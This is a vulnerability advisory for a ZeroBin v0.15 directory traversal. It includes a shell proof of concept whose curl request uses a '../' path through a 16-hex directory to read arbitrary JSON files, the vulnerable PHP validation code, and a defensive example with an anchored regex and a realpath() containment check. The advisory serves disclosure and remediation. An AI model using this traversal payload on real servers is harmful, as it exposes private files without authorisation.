ZeroBin v0.15 is vulnerable to directory traversal which may allow
unauthenticated users to view the contents of arbitrary files, with web server
permissions, if a number of conditions are met.
- The target file must contain valid JSON
- The user must know the location of the target file on the filesystem
- A directory with 16 or more valid hex characters must exist on the filesystem
- The user must know the location of the directory on the filesystem
The following proof of concept is available:
```shell
# create a directory with 16 hex characters
mkdir /tmp/aaaaaaaaaaaaaaaa
# create a 'secret' file to be stolen
echo '{"secret":"this is a secret in a file containing valid JSON"}' > /tmp/secret.txt
# steal the file
curl http://example.com/ZeroBin/index.php?..//../../../../../../../../../../../../../../../../../tmp/aaaaaaaaaaaaaaaa/../../../tmp/secret.txt | grep "cipherdata"
```
Vulnerable code:
'index.php' from line 268 checks only that the query string contains a 16-character hex substring (the regular expression is unanchored, so it matches anywhere in the string) and performs no other validation.
On line 277 the contents of the file are stored in '$paste'.
```php
if (!empty($_SERVER['QUERY_STRING'])) // Display an existing paste.
{
    $dataid = $_SERVER['QUERY_STRING'];
    if (preg_match('/[a-f\d]{16}/',$dataid)) // Is this a valid paste identifier ?
    {
        $filename = dataid2path($dataid).$dataid;
        if (is_file($filename)) // Check that paste exists.
        {
            // Get the paste itself.
            $paste=json_decode(file_get_contents($filename));
            // ...
        }
    }
}
```
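The root cause is the unanchored pattern: `preg_match('/[a-f\d]{16}/', ...)` accepts any query string that merely contains sixteen hex characters, which is why the proof of concept only needs a 16-hex directory somewhere in its traversal path. The following is an added example, not ZeroBin's own code or its eventual fix. It places the quoted check beside an anchored one, shows a trailing-newline edge case that `$` alone would miss, and adds a `realpath()` containment check as defence in depth. `example_dataid2path()` is a hypothetical stand-in for the page's `dataid2path()`; the layout it assumes and all sample inputs are constructed for the demonstration.

```php
<?php
// Added example (not ZeroBin code): weak vs. strict paste-id validation.

// Hypothetical stand-in for dataid2path(): two directory levels derived from
// the id. The exact layout is an assumption for this example only.
function example_dataid2path(string $base, string $dataid): string
{
    return $base . '/' . substr($dataid, 0, 2) . '/' . substr($dataid, 2, 2) . '/';
}

// Check as quoted from index.php: unanchored, so any string that merely
// CONTAINS 16 hex characters is accepted, including a traversal path that
// passes through a 16-hex directory name.
function weak_is_valid_dataid(string $dataid): bool
{
    return preg_match('/[a-f\d]{16}/', $dataid) === 1;
}

// Hardened check: the entire query string must be exactly 16 hex characters.
// \A and \z are used instead of ^ and $ because in PCRE '$' also matches
// just before a trailing "\n", which would let "<id>\n" slip through.
function strict_is_valid_dataid(string $dataid): bool
{
    return preg_match('/\A[a-f\d]{16}\z/', $dataid) === 1;
}

// Defence in depth: after building the path, resolve it and refuse anything
// that does not stay beneath the data directory. realpath() returns false
// for a missing file, which is treated as "not contained".
function path_is_contained(string $filename, string $base): bool
{
    $realBase = realpath($base);
    $realFile = realpath($filename);
    if ($realBase === false || $realFile === false) {
        return false;
    }
    return strpos($realFile, $realBase . DIRECTORY_SEPARATOR) === 0;
}

// Constructed inputs: one genuine id, the traversal string from the report,
// an id with a trailing newline, and a non-hex string.
$samples = [
    '0123456789abcdef',
    '..//../../../../../../tmp/aaaaaaaaaaaaaaaa/../../../tmp/secret.txt',
    "0123456789abcdef\n",
    '0123456789abcdeg',
];

foreach ($samples as $s) {
    printf("%-72s weak=%-5s strict=%s\n",
        json_encode($s),
        weak_is_valid_dataid($s) ? 'true' : 'false',
        strict_is_valid_dataid($s) ? 'true' : 'false');
}

// Constructed on-disk layout for the containment check (temporary directory).
$base = sys_get_temp_dir() . '/zerobin_example_data';
@mkdir($base . '/01/23', 0700, true);
file_put_contents($base . '/01/23/0123456789abcdef', '{"demo":true}');
$outside = tempnam(sys_get_temp_dir(), 'outside_');
file_put_contents($outside, '{"secret":"constructed"}');

$inside = example_dataid2path($base, '0123456789abcdef') . '0123456789abcdef';
$escaped = $base . '/01/23/../../../' . basename($outside);

printf("inside  contained=%s\n", path_is_contained($inside, $base) ? 'true' : 'false');   // true
printf("escaped contained=%s\n", path_is_contained($escaped, $base) ? 'true' : 'false');  // false

unlink($outside);
```

Run it with `php example.php`. The first two samples both pass the weak check, which is the bug in one line; only the genuine id passes the strict one, and the newline variant shows why `\z` is preferred over `$`. The containment check is independent of the regex and would have caught this traversal even with the original pattern in place.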